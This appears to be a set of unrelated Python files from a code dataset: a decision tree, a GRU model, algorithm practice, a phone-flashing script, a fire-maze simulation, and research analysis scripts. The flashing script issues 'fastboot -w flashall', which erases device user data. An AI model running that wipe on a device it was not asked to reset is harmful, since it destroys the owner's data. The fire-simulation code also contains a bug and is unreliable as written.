calc_info_gains(heart, info_gains)\n\n\tvals = list(info_gains.values())\n\tfeat = list(info_gains.keys())\n\n\treturn feat[vals.index(max(vals))]\n\ndef create_tree(heart, dec_tree = 0):\n\t# Find the feature to split on i.e. the node feature\n\tinfo_gains = {}\n\tnode_feature = find_feature(heart, info_gains)\n\tnode_feat_vals = heart[node_feature]\n\n\t# Initialise decision tree\n\tif dec_tree == 0:\n\t\tdec_tree = {}\n\t\tdec_tree[node_feature] = {}\n\n\t# Get all values for the node\n\tall_node_vals = np.unique(node_feat_vals)\n\tprint(node_feature)\n\t# Build the tree with recursion\n\tfor val in all_node_vals:\n\t\tsub_tree = heart[node_feat_vals == val].reset_index(drop=True)\n\n\t\tvalues, size = np.unique(sub_tree['target'], return_counts=True)\n\t\tprint(val)\n\t\tprint(values)\n\t\tprint(size)\n\t\t# More of the tree needs to be built\n\t\tif len(size) > 1:\n\t\t\tprint(dec_tree[node_feature])\n\t\t\tprint(\"Making recursive call\\n\\n\\n\")\n\t\t\twithout_target = sub_tree.drop(['target'], axis=1)\n\t\t\tno_duplicates = without_target.drop_duplicates(without_target.columns)\n\t\t\t\n\t\t\t# if node_feature == 'Short_Breath':\n\t\t\tif len(no_duplicates) == 1:\n\t\t\t\tprint(\"THEY'RE EQUAL\\n\\n\\n\")\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprint(\"Making recursive call\\n\\n\\n\")\n\t\t\t\tdec_tree[node_feature][val] = create_tree(sub_tree) \n\t\t\n\t\t# This is the leaf node\n\t\telse:\n\t\t\tdec_tree[node_feature][val] = values[0]\n\t\t\t\n\treturn dec_tree\n\n\ndef make_prediction(new_data, decision_tree):\n\t# Start at the root node\n\troot = list(decision_tree.keys())\n\n\t# Loop through all possible sub nodes\n\tfor sub_node in root:\n\t\t\n\t\t# Getting the value of the root node for the new data point\n\t\tval = new_data[sub_node]\n\t\t\n\t\t# Getting the subtree at that value\n\t\tdecision_tree = decision_tree[sub_node][val]\n\t\tpred = 0\n\n\t\t# If the subtree has its own subtree then make the recursive call\n\t\tif type(decision_tree) == type({}):\n\t\t\tpred = make_prediction(new_data, decision_tree)\n\t\t\n\t\t# The subtree just contains the prediction\n\t\telse:\n\t\t\tpred = decision_tree\n\n\treturn pred\n\n\ndef main():\n\t# Load dataset\n\theart = load_dataframe()\n\tdata = np.array([21,1,1,131,87,205,5,4,0,0,75,0])\n\tinstance = pd.Series(data, index=['age','sex','cp','trestbps','trestbpd',\n\t\t\t\t\t\t\t\t\t'chol','cigs','years','fbs','famhist','thalrest',\n\t\t\t\t\t\t\t\t\t'exang'])\n\n\tprint(instance)\n\n\t# heart = heart.append(instance, ignore_index=True)\n\n\t# Bin features\n\theart, columns_to_bin = bin_values(heart)\n\tcolumns_to_bin = ['age', 'trestbps', 'trestbpd', 'chol', 'cigs', 'years', 'thalrest']\n\n\t# print(heart.tail())\n\n\t# instance = heart.drop(['target'], axis=1).iloc[-1]\n\t# heart = heart.drop(heart.index[-1])\n\n\n\t# Build tree\n\tdecision_tree = create_tree(heart)\n\tjoblib.dump(decision_tree, 'heart_dt_hascp.pkl')\n\t# print(heart.iloc[4])\n\n\t# new_data = heart.drop(['target'], axis=1).iloc[4]\n\n\t# Make predictions\n\t# pred = make_prediction(instance, decision_tree)\n\n\t# print(pred)\n\nmain()","sub_path":"id3.py","file_name":"id3.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"267072216","text":"\"\"\"\"Creates Gated Recurrent Unit (GRU) model.\"\"\"\n\nimport tensorflow as tf\n\n\ndef GRU(\n input_shape,\n output_size,\n loss,\n optimizer,\n recurrent_units=[64],\n recurrent_dropout=0,\n return_sequences=False,\n dense_layers=[],\n dense_dropout=0,\n out_activation=\"linear\",\n):\n \"\"\"Gated Recurrent Unit (GRU).\n\n Args:\n input_shape (tuple): Shape of the input data\n output_size (int): Number of neurons of the last layer.\n loss (tf.keras.Loss): Loss to be use for training.\n optimizer (tf.keras.Optimizer): Optimizer that implements theraining algorithm.\n recurrent_units (list, optional): Number of recurrent units for each GRU layer.\n Defaults to [64].\n recurrent_dropout (int between 0 and 1, optional): Fraction of the input units to drop.\n Defaults to 0.\n return_sequences (bool, optional): Whether to return the last output in the output sequence, or the full sequence.\n Defaults to False.\n dense_layers (list, optional): List with the number of hidden neurons for each\n layer of the dense block before the output.\n Defaults to [].\n dense_dropout (float between 0 and 1, optional): Fraction of the dense units to drop.\n Defaults to 0.0.\n out_activation (tf activation function, optional): Activation of the output layer.\n Defaults to \"linear\".\n\n Returns:\n tf.keras.Model: GRU model\n \"\"\"\n input_shape = input_shape[-len(input_shape) + 1 :]\n inputs = tf.keras.layers.Input(shape=input_shape)\n\n x = inputs\n if len(input_shape) < 2:\n x = tf.keras.layers.Reshape((inputs.shape[1], 1))(x)\n\n # GRU layers\n for i, u in enumerate(recurrent_units):\n return_sequences_tmp = (\n return_sequences if i == len(recurrent_units) - 1 else True\n )\n x = tf.keras.layers.GRU(\n u, return_sequences=return_sequences_tmp, dropout=recurrent_dropout\n )(x)\n\n # Dense layers\n if return_sequences:\n x = tf.keras.layers.Flatten()(x)\n for hidden_units in dense_layers:\n x = tf.keras.layers.Dense(hidden_units)(x)\n if dense_dropout > 0:\n x = tf.keras.layers.Dropout(dense_dropout)(x)\n x = tf.keras.layers.Dense(output_size, activation=out_activation)(x)\n\n model = tf.keras.Model(inputs=inputs, outputs=x)\n model.compile(optimizer=optimizer, loss=loss)\n\n return model\n","sub_path":"ADLStream/models/gru.py","file_name":"gru.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"633911595","text":"class Solution(object):\n def largestRectangleArea(self, heights):\n \"\"\"\n :type heights: List[int]\n :rtype: int\n \"\"\"\n max_area = 0\n dp = []\n dp.append(-1)\n lenth = len(heights)\n for i in range(lenth):\n while(dp[len(dp) - 1] != -1 and heights[dp[len(dp) - 1]] >= heights[i]):\n max_area = max(max_area, heights[dp.pop()] * (i - dp[len(dp) - 1] -1)) \n dp.append(i)\n while(dp[len(dp) - 1] != -1):\n max_area = max(max_area, heights[dp.pop()] * (lenth - dp[len(dp) - 1] - 1))\n return max_area\n ","sub_path":"84.Largest Rectangle in Histogram.py","file_name":"84.Largest Rectangle in Histogram.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"615651777","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*- \n\nimport os \nimport os,sys \nimport hashlib\nimport shutil\nimport time\nimport datetime\n\n#输入ID,返回设备名\ndef trans_ID(ID):\n fp = open('/home/b/Desktop/tools/dev.txt', 'r')\n \n cnt = 0;\n name = fp.readline(); \n while name:\n name = name.strip()\n if cnt == ID:\n break;\n \n cnt = cnt + 1;\n name = fp.readline() \n\n fp.close()\n return name\ndef main():\n if len(sys.argv) != 2:\n print(\"未输入手机的ID\")\n return; \n\n phoneID = trans_ID(int(sys.argv[1]))\n\n \n os.system('cd ..')\n os.system('adb -s %s reboot bootloader' % phoneID)\n os.system('fastboot -s %s -w flashall' % phoneID)\n \nif __name__==\"__main__\": main()\n\n\n","sub_path":"zHAMMERHEAD/sysimg.py","file_name":"sysimg.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"443491436","text":"import random\nimport numpy as np\nfrom queue import Queue\nimport math\nimport matplotlib.pyplot as plt\nimport copy\nfrom matplotlib.pyplot import MultipleLocator\n\n\n\n\n# The matrix has valuable path from the upper-left corner to the lower-right corner and from upper-right corner to the lower-left corner\ndef BFS(matrix, x, y, x1, y1):\n\tvisit = np.zeros((dim,dim)) \t# Mark the point visited\n\tvisit[x][y] = 1\t\t\t\t\t# Mark the start point visited\n\tqueue = []\t\t\t\t\t\t# Mark the point needed to be exploered\n\tqueue.append([x, y])\t\t\t# Put Start point into \n\tgoal = 0\t\t\t\t\t\t# When goal = 1, we find goal\n\tx,y = [0, 0, 1, -1], [1, -1, 0, 0] \t# Go one step in four directions \n\n\twhile len(queue) > 0 and goal == 0:\t# Act when queue is not empty and have not find the goal\n\t\tsearch_point = queue.pop(0)\t\t# get queue[0], and delete it from the queue\n\t\tfor i in range(4):\t\t\t\t# Go four direction\n\t\t\tobj_x = search_point[0] + x[i]\t# The new point\n\t\t\tobj_y = search_point[1] + y[i]\n\t\t\tif obj_x == x1 and obj_y == y1:\t# if we find the goal\n\t\t\t\tqueue.append([obj_x, obj_y])\n\t\t\t\tgoal = 1\t# Mark\n\t\t\t\tbreak;\n\n\t\t\tif IsValid(obj_x, obj_y, matrix) and visit[obj_x][obj_y] == 0:\t# Check if the new point is valid or not \n\t\t\t\tvisit[obj_x][obj_y] = 1\t\t# this point is visited\n\t\t\t\tqueue.append([obj_x, obj_y])\t#add to the queue, wait to be explore\n\n\tif goal == 1:\t#if find the goal\n\t\treturn True\n\telse:\t\t\t# if not\n\t\treturn False\n\ndef BFS_with_Fire(matrix):\t# We use BFS algorithm to find the path to the goal, while the fire will expand\n\tvisit = np.zeros((dim, dim)) # Mark the point visited\n\tvisit_fire = np.zeros((dim, dim)) # Mark if the point is on fire , it if 5, or how many fire neighbours it has; if no neighbours is on fire, mark 0\n\tvisit[0][0] = 1\t\t\t# Mark the start point\n\tvisit_fire[0][dim-1] = 5\t# Mark the fire start point\n\tqueue = []\t\t\t\t\t# Mark the point needed to be exploered\n\tqueue.append([0, 0])\n\tqueue_fire = []\t\t\t\t# Mark the fire point needed to be exploered\n\tqueue_fire.append([0, dim-1])\n\tif matrix[0][dim-2] == 0:\t\t# check it is valid or not\n\t\tvisit_fire[0][dim-2] = 1\t# because [0, dim-1] is on fire, it has 1 fire neighbour\n\tif matrix[1][dim-1] == 0:\n\t\tvisit_fire[1][dim-1] = 1\t# because [1, dim-2] is on fire, it has 1 fire neighbour\n\n\tgoal = 0\n\tx,y = [0, 0, 1, -1], [1, -1, 0, 0] # four direction the point can go\n\twhile len(queue) > 0:\n\t\tvalue = 0\t\t\t\t\t\t# if equals to 1, means we have fire point we needs to explore\n\t\tsearch_point = queue.pop(0)\t\t# get the first element in queue, and delete it from queue\n\t\tif len(queue_fire) > 0:\n\t\t\tsearch_point_fire = queue_fire.pop(0)\n\t\t\tvalue = 1\n\t\tfor i in range(4):\t\t# four direction\n\t\t\tobj_x = search_point[0] + x[i]\t# explore the point in four direction\t\n\t\t\tobj_y = search_point[1] + y[i]\n\n\t\t\tif obj_x == dim-1 and obj_y == dim-1: #find goal or not\n\t\t\t\tqueue.append([obj_x, obj_y])\n\t\t\t\t#goal = 1\n\t\t\t\treturn True;\n\n\t\t\tif IsValid(obj_x, obj_y, matrix) and visit[obj_x][obj_y] == 0 and visit_fire[obj_x][obj_y] == 0: #if the point is valid, no fire and have not been visited\n\t\t\t\tvisit[obj_x][obj_y] = 1\t\t# Mark\n\t\t\t\tqueue.append([obj_x, obj_y]) #Put the children point into queue\n\n\t\t\tif value == 1:\t#means we have some fire points to check\n\t\t\t\tif visit_fire[search_point_fire[0]][search_point_fire[1]] != 5:\t# not fire cell but has fire neighbour\n\t\t\t\t\tprob = 1 - math.pow(1-q, visit_fire[search_point_fire[0]][search_point_fire[1]])\t# calculate the probility the cell to get on fire\n\n\t\t\t\t\tif random.random() <= prob:\t\t# if the less than prob, it would get fire\n\t\t\t\t\t\tvisit_fire[search_point_fire[0]][search_point_fire[1]] = 5 # set 5, means the cell is on fire\n\t\t\t\t\t\tqueue_fire.append(search_point_fire)\n\t\t\t\t\t\tif search_point_fire in queue:\n\t\t\t\t\t\t\tqueue.remove(search_point_fire) # this cell can not be searched\n\n\t\t\t\t\t\tfor i in range(4):\t# explore its neighbour\n\t\t\t\t\t\t\tobj_x_fire_1 = obj_x_fire + x[i]\n\t\t\t\t\t\t\tobj_y_fire_1 = obj_y_fire + y[i]\n\t\t\t\t\t\t\tif IsValid(obj_x_fire_1, obj_y_fire_1, matrix) and visit_fire[obj_x_fire_1][obj_y_fire_1] != 5:\n\t\t\t\t\t\t\t\tvisit_fire[obj_x_fire_1][obj_y_fire_1] += 1 # means it has a new burning neighbour\n\t\t\t\t\telse:\n\t\t\t\t\t\tqueue_fire.append(search_point_fire)\t# wait for next check\n\n\t\t\t\telse:\t\n\t\t\t\t\tfor i in range(4):\t# Search the burning cell's neighbour\n\t\t\t\t\t\tobj_x_fire = search_point_fire[0] + x[i]\n\t\t\t\t\t\tobj_y_fire = search_point_fire[1] + y[i]\n\t\t\t\t\t\tif IsValid(obj_x_fire, obj_y_fire, matrix) and visit_fire[obj_x_fire][obj_y_fire] != 5:\t# for a valid cell, to find if the cell would be on fire\n\t\t\t\t\t\t\tprob = 1 - math.pow(1-q, visit_fire[obj_x_fire][obj_y_fire])\t# calculare the probility\n\n\t\t\t\t\t\t\tif random.random() <= prob:\n\t\t\t\t\t\t\t\tvisit_fire[obj_x_fire][obj_y_fire] = 5\t# get on fire\n\n\t\t\t\t\t\t\t\tqueue_fire.append([obj_x_fire, obj_y_fire]) # would check the new burning cell's neighbour\n\t\t\t\t\t\t\t\tif [obj_x_fire, obj_y_fire] in queue:\n\t\t\t\t\t\t\t\t\tqueue.remove([obj_x_fire, obj_y_fire])\n\n\t\t\t\t\t\t\t\tfor i in range(4):\n\t\t\t\t\t\t\t\t\tobj_x_fire_1 = obj_x_fire + x[i]\t# to add the number of burning cell nearby of the new burning cell's four neighbour\n\t\t\t\t\t\t\t\t\tobj_y_fire_1 = obj_y_fire + y[i]\n\t\t\t\t\t\t\t\t\tif IsValid(obj_x_fire_1, obj_y_fire_1, matrix) and visit_fire[obj_x_fire_1][obj_y_fire_1] != 5:\n\t\t\t\t\t\t\t\t\t\tvisit_fire[obj_x_fire_1][obj_y_fire_1] += 1\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tqueue_fire.append([obj_x_fire, obj_y_fire])\t# fail to get fire, wait for next check\n\n\t\t#if len(wait_fire) != 0:\n\t\t#\ttemp = wait_fire.pop(0)\n\t\t#\tprob = 1 - math.pow(1-q, visit_fire[temp[0]][temp[1]])\n\t\t#\ta = random.random()\n\n\t\t#\tif a <= prob:\n\t\t#\t\tvisit_fire[temp[0]][temp[1]] = 5\n\t\t#\t\tqueue_fire.append([temp[0], temp[1]])\n\t\t#\t\tif [temp[0], temp[1]] in queue:\n\t\t#\t\t\tqueue.remove([temp[0], temp[1]])\n\n\t\t#\t\tfor i in range(4):\n\t\t#\t\t\ttemp_x = temp[0] + x[i]\n\t\t#\t\t\ttemp_y = temp[1] + y[i]\n\t\t#\t\t\tif temp_x < dim and temp_x >= 0 and temp_y < dim and temp_y >= 0 and matrix[temp_x][temp_y] == 0 and visit_fire[temp_x][temp_y] != 5:\n\t\t#\t\t\t\tvisit_fire[temp_x][temp_y] += 1\n\t\t\t\t\t\t#queue_fire.append([temp_x, temp_y])\n\t\t#\telse:\n\t\t#\t\tif [temp[0], temp[1]] not in wait_fire:\n\t\t#\t\t\twait_fire.append([temp[0], temp[1]])\n\treturn False\n\ndef IsValid(x, y, matrix):\t# check [x,y] is matrix is valid or not\n\tif x < dim and x >= 0 and y < dim and y >= 0 and matrix[x][y] == 0:\n\t\treturn True\t\t# valid\n\telse:\n\t\treturn False\n\n\n\ndef random_matrix():\t#Produce random maze\n\tmatrix = np.random.rand(dim,dim)\n\tn = range(dim)\n\tfor i in n: \t# For every elements in the array, if its number leass than 0.25, it becomes the wall, otherwise it is the road\n\t\tfor j in n:\n\t\t\tif matrix[i][j] <= 0.2:\n\t\t\t\tmatrix[i][j] = 1\n\t\t\telse:\n\t\t\t\tmatrix[i][j] = 0\n\tmatrix[0][0] = 0\t\t#The point in the four corner is road\n\tmatrix[dim-1][dim-1] = 0\n\tmatrix[0][dim-1] = 0\n\tmatrix[dim-1][0] = 0\n\treturn matrix\n\ndim = 100 #dimension is 100\n# q = 0.8\nq_range=101\nsuccrate=np.zeros(q_range)\nfor i in range(q_range):\n\tq=0+0.01*i\n\tsucc=0\n\tfor k in range(100):\n\t\tmatrix = random_matrix()\t#generate random maze\n\n\t\twhile (BFS(matrix, 0, 0, dim-1, dim-1) is False) or (BFS(matrix, dim-1, 0, 0, dim-1) is False): # generate valid maze which can find 2 paths successfully\n\t\t\tmatrix = random_matrix()\n\n\t\tif (BFS_with_Fire(copy.deepcopy(matrix))) == True:\n\t\t\tsucc+=1\n\t\t\tprint(\"Success\")\t# success\n\t\telse:\n\t\t\tprint(\"Fail\")\n\tsuccrate[i]=succ/100\nq_arr = np.arange(0, 1.01, 0.01) # The probility of a block get fire when there is a fire block nearby\nplt.plot(q_arr,succrate,color='r')\nplt.xlabel('flammability rate')\nplt.ylabel('success rate')\n\nx_major_locator=MultipleLocator(0.1)\ny_major_locator=MultipleLocator(0.05)\n\n\nax=plt.gca()\n\nax.xaxis.set_major_locator(x_major_locator)\n\nax.yaxis.set_major_locator(y_major_locator)\n\n# plt.xlim(-0.5,11)\n#\n# plt.ylim(-5,110)\n\n\nplt.title('Relations between success rate and flammability rate')\nplt.show()\n\n\n\n\n\n\n\n\n","sub_path":"Maze Runner/Task 4/On_fire.py","file_name":"On_fire.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"235990978","text":"\"\"\"\nThis script evaluates the policy\n\"\"\"\n\nfrom B_helper import *\n\n\n#%%\nresult_folder = \"C:\\\\Users\\\\Stefan\\\\LRZ Sync+Share\\\\Masterarbeit-Klein\\\\Code\\\\Results\\\\exampleStefan-True-ES-MultiLeg-190827-1516\"\n\n#%%\na = pd.read_csv(\"0_settings.csv\", delimiter=\"\\t\", header=None)\nb = pd.read_csv(result_folder+\"\\\\0_settings.csv\", delimiter=\"\\t\", header=None)\nif not(a.equals(b)):\n raise ValueError(\"SettingFiles don't coincide.\")\n\nlogfile, newpath, var_capacities, var_no_purchase_preferences, resources, products, revenues, A, \\\n customer_segments, preference_weights, arrival_probabilities, times, T, time_start,\\\n epsilon, exponential_smoothing,\\\n K, online_K, I \\\n = setup_testing(\"ES-evaluation\")\n\ncapacities = var_capacities[0]\nno_purchase_preference = var_no_purchase_preferences[0]\n\n\n#%%\n# generate the random sample paths (T+1 => have real life indexing starting at t=1)\n# online_K = 100\nnp.random.seed(123)\nseed(123)\ncustomer_stream = np.random.random((online_K, T+1))\nsales_stream = np.random.random((online_K, T+1))\n\ndef save_files(storagepath, *args):\n # makedirs(storagepath)\n\n for o in [*args]:\n o_name = re.sub(\"[\\[\\]']\", \"\", str(varnameis(o)))\n # print(o_name)\n with open(storagepath + \"\\\\\" + o_name + \".data\", \"wb\") as filehandle:\n pickle.dump(o, filehandle)\n\ndef varnameis(v): d = globals(); return [k for k in d if d[k] is v]\n\n# %%\n# Actual Code\ndef get_offer_set(no_purchase_preference, c, t):\n # via index of optimal offer set\n return tuple(offer_sets.iloc[dat[str(no_purchase_preference)][t].iloc[dict_offer_sets[tuple(c)], 1]])\n\ndef get_offer_set_index(no_purchase_preference, c, t):\n # via index of optimal offer set\n return dat[str(no_purchase_preference)][t].iloc[dict_offer_sets[tuple(c)], 1]\n\n#%%\nwith open(result_folder+\"\\\\totalresults.data\", \"rb\") as filehandle:\n dat_lookup = pickle.load(filehandle)\n\ndict_offer_sets = {k:v for v,k in enumerate(list(dat_lookup[str(no_purchase_preference)][0].index))}\n\ndat = deepcopy(dat_lookup)\nfor no_purchase_preference in var_no_purchase_preferences:\n for t in np.arange(T+1):\n dat[t] = dat[str(no_purchase_preference)][t].reset_index(drop=True)\n\noffer_sets = pd.DataFrame(get_offer_sets_all(products))\n\n#%%\n# online_K+1 policy iterations (starting with 0)\n# values, products sold, offersets offered, capacities remaining\nv_results = np.array([np.zeros(len(times))]*online_K)\np_results = np.array([np.zeros(len(times))]*online_K)\nwhy_no_purchase_results = np.array([np.zeros(len(times))]*online_K)\no_results = np.zeros((online_K, len(times))) # same as above, higher skill level\nc_results = np.array([np.zeros(shape=(len(times), len(capacities)))]*online_K)\n\nvalue_final = pd.DataFrame(v_results[:, 0]) # setup result storage empty\ncapacities_final = {}\nproducts_all = {}\noffersets_all = {}\nwhy_no_purchase_all = {}\n\n#%%\nfor capacities in var_capacities:\n for preferences_no_purchase in var_no_purchase_preferences:\n print(capacities, \"of\", str(var_capacities), \" - and - \", preferences_no_purchase, \"of\", str(var_no_purchase_preferences), \"starting.\")\n\n # reset the data\n v_results = np.zeros_like(v_results)\n p_results = np.zeros_like(p_results)\n why_no_purchase_results = np.zeros_like(why_no_purchase_results, dtype=int)\n c_results = np.zeros_like(c_results)\n o_results = np.zeros_like(o_results)\n\n\n for k in np.arange(online_K)+1:\n if k % 100 == 0:\n print(\"k: \", k)\n customer_random_stream = customer_stream[k-1]\n sales_random_stream = sales_stream[k-1]\n\n # line 3\n r_result = np.zeros(len(times)) # will become v_result\n c_result = np.zeros(shape=(len(times), len(capacities)), dtype=int)\n p_result = np.zeros(len(times))\n why_no_purchase_result = np.zeros(len(times), dtype=int)\n o_result = np.zeros(len(times))\n\n # line 5\n c = deepcopy(capacities) # (starting capacity at time 0)\n\n\n offerset = np.zeros([len(times), offer_sets.shape[1]])\n for t in times:\n if any(c < 0):\n raise ValueError\n # line 7 (starting capacity at time t)\n c_result[t] = c\n\n offer_set = get_offer_set(preferences_no_purchase, c, t)\n offerset[t, :] = np.array(offer_set)\n o_result[t] = get_offer_set_index(preferences_no_purchase, c, t)\n\n # line 13 (simulate sales)\n # sold, customer = simulate_sales(offer_set, customer_random_stream[t], sales_random_stream[t],\n # arrival_probabilities, preference_weights, preferences_no_purchase)\n sold, why_no_purchase = simulate_sales_evaluation(offer_set, customer_random_stream[t],\n sales_random_stream[t], arrival_probabilities,\n preference_weights, no_purchase_preference)\n p_result[t] = sold\n why_no_purchase_result[t] = why_no_purchase\n\n # line 14\n try:\n r_result[t] = revenues[sold]\n c -= A[:, sold]\n except IndexError:\n # no product was sold\n pass\n\n # line 16-18\n v_results[k - 1] = np.cumsum(r_result[::-1])[::-1]\n c_results[k - 1] = c_result\n p_results[k - 1] = p_result\n why_no_purchase_results[k - 1] = why_no_purchase_result\n o_results[k - 1] = o_result\n\n value_final['' + str(capacities) + '-' + str(no_purchase_preference)] = pd.DataFrame(v_results[:, 0])\n capacities_final['' + str(capacities) + '-' + str(no_purchase_preference)] = pd.DataFrame(c_results[:, -1, :])\n products_all['' + str(capacities) + '-' + str(no_purchase_preference)] = p_results\n why_no_purchase_all['' + str(capacities) + '-' + str(no_purchase_preference)] = why_no_purchase_results\n offersets_all['' + str(capacities) + '-' + str(no_purchase_preference)] = o_results\n\n# %%\n# write result of calculations\nsave_files(newpath, value_final, capacities_final, products_all, offersets_all, why_no_purchase_all)\n\n# %%\nwrapup(logfile, time_start, newpath)\n\n","sub_path":"Code/D_exact_solution_multi_leg_evaluation.py","file_name":"D_exact_solution_multi_leg_evaluation.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"79825526","text":"import sys\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nimport collections\nimport json\n\nmetrics = collections.defaultdict(int)\ndef incr(name):\n metrics[name] += 1\n\ndef add(name, num):\n metrics[name] += num\n\ndef varname(var):\n return list(dict(abc=abc).keys())[0]\n\ndef show_metrics():\n for key,val in metrics.items():\n print(\": \".join((key,str(val))))\n\ndef get(items, idx):\n if items[idx].replace(\",\",\"\").strip() in (\"#DIV/0!\", \"#NUM!\") :\n return 0\n else: \n return float(items[idx].replace(\",\",\"\").strip())\n\nclass VarObj():\n def __init__(self, name):\n self.name = name\n self.data = []\n\n def add(self, num):\n self.data.append(num)\n \n def size(self):\n return len(self.data)\n\n def sum(self):\n return np.sum(self.data)\n \n def mean(self):\n return np.sum(self.data)/len(self.data)\n\n def median(self):\n if len(self.data) == 1:\n return self.data[0]\n\n if len(self.data)%2 == 1:\n return self.data[len(self.data)//2]\n else:\n m = len(self.data)//2\n return (self.data[m] + self.data[m - 1])/2\n \n def max(self):\n return max(self.data)\n\n def min(self):\n return min(self.data)\n\n def one_quarter(self):\n pos = len(self.data) * 0.25\n if pos.is_integer():\n pos = int(pos)\n return (self.data[pos-1] + self.data[pos])/2\n else:\n return self.data[int(pos)]\n\n def three_quarter(self):\n pos = len(self.data) * 0.75\n if pos.is_integer():\n pos = int(pos)\n return (self.data[pos-1] + self.data[pos])/2\n else:\n return self.data[int(pos)]\n\n def std(self):\n square_error = 0\n mean = self.mean()\n for n in self.data:\n square_error += (n - mean)**2\n return np.sqrt(square_error)\n\n def winsor(self, percent):\n if len(self.data) == 0:\n return\n pos = len(self.data) * percent\n if pos.is_integer():\n pos = int(pos)\n num = (self.data[pos-1] + self.data[pos])/2\n for n in range(0, pos + 1):\n self.data[n] = num\n\n num = (self.data[len(self.data) - pos] + self.data[len(self.data) - pos + 1])/2\n for n in range(len(self.data) - pos, len(self.data)):\n self.data[n] = num\n else:\n pos = int(pos)\n num = self.data[pos]\n for n in range(0, pos):\n self.data[n] = num\n\n num = self.data[len(self.data) - pos]\n for n in range(len(self.data) - pos, len(self.data)):\n self.data[n] = num\n\n def __str__(self):\n self.data = sorted(self.data)\n self.winsor(0.01)\n rs=[self.mean(), self.std(), self.min(), self.one_quarter(), self.median(), \n self.three_quarter(), self.max()]\n return \"\\t\".join([\"%0.4f\" % x for x in rs])\n\n def __dict__(self):\n return {\"no\":\"obj\"}\n \n\ndef accounting_quality():\n keys=[\"r2\",\"syn\",\"aiq\",\"size\",\"lev\",\"mb\",\"roe\",\"inst\",\"age\",\"turnover\",\"indsize\",\"soe\"]\n datas = {\n \"r2\":VarObj(\"r2\"),\n \"syn\":VarObj(\"syn\"),\n \"aiq\":VarObj(\"aiq\"),\n \"size\":VarObj(\"size\"),\n \"lev\":VarObj(\"lev\"),\n \"mb\": VarObj(\"mb\"),\n \"roe\":VarObj(\"roe\"),\n \"inst\":VarObj(\"inst\"),\n \"age\":VarObj(\"age\"),\n \"turnover\":VarObj(\"turnover\"),\n \"indsize\":VarObj(\"indsize\"),\n \"soe\":VarObj(\"soe\")\n }\n\n year_metrics=[\"r2\", \"syn\", \"aiq\"]\n year_dict = collections.defaultdict(dict)\n for year in range(2008, 2018):\n for name in year_metrics:\n year_dict[str(year)][name] = VarObj(name)\n \n with open(\"sec_level.data\") as fd:\n reader = csv.reader(fd)\n for items in reader:\n code = items[0]\n year = items[1]\n r2 = get(items, 2)\n syn = get(items, 3)\n aiq = get(items, 4)\n size = get(items, 5)\n lev = get(items, 6)\n mb = get(items, 7)\n roe = get(items, 8)\n inst = get(items, 9)\n age = get(items, 10)\n turnover = get(items, 11)\n indsize = get(items, 12)\n soe = get(items, 13)\n\n incr(\"total\") \n\n for k in keys:\n datas[k].add(eval(k))\n\n #print(json.dumps(year_dict, default=lambda obj:obj.__dict__))\n #print(year_dict[year])\n for name in year_metrics:\n #print(year, name)\n #if name in \n #print(year_dict[name])\n year_dict[year][name].add(eval(name))\n\n show_metrics()\n for d in keys:\n print(\"%s\\t%s\" % (d, datas[d]))\n\n print(\"stats by year:\")\n with open(\"stats_by_year.txt\", \"w\") as ofd:\n for year in year_dict:\n for name in year_dict[year]:\n print(\"%s\\t%s\\t%0.4f\\t%d\\t%s\" % (year, name, year_dict[year][name].sum(), year_dict[year][name].size(), year_dict[year][name]))\n ofd.write(\"%s\\t%s\\t%d\\t%s\\n\" % (year, name, year_dict[year][name].size(), year_dict[year][name]))\n pass\n\n\ndef main():\n accounting_quality()\n pass\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"stockshare/analysis_aiq.py","file_name":"analysis_aiq.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"259079469","text":"\"\"\"\n@copyright Copyright (c) 2011 - 2016, Intel Corporation.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\n@file test_pfc_samples.py\n\n@summary Samples for PFC configuration.\n\n@details\nFollowing test cases are tested:\n1. Verify that device doesn't flood received pause frames when flow control\n mode is configured.\n2. Verify that \"RxTx\" flow control manages traffic correctly.\n\"\"\"\nimport time\n\nimport pytest\n\nfrom testlib import helpers\n\n\n@pytest.mark.flow_control\n@pytest.mark.simplified\nclass TestPFCSamples(object):\n \"\"\"\n @description Suite for PFC testing\n \"\"\"\n\n# Attributes and Properties\n\n def rate_decreasing(self, pf_rate=None, quanta=None, pause_frame_size=64,\n full_rate=None, actual_rate=None):\n \"\"\"\n @brief Calculated expected line rate during stream of pause frames is sending.\n @param pf_rate: PFC rate\n @type pf_rate: int\n @param quanta: PFC quanta\n @type quanta: int\n @param pause_frame_size: PFC frame size\n @type pause_frame_size: int\n @param full_rate: full rate\n @type full_rate: int\n @param actual_rate: actual rate\n @type actual_rate: int\n @rtype: bool\n @return: True if actual rate is equal to the calculated expected line rate\n \"\"\"\n x = pf_rate // 10\n ptime = quanta * 96\n frame_rate = (x * 1000000000) // (pause_frame_size + 20) // 8\n sweeper_p = 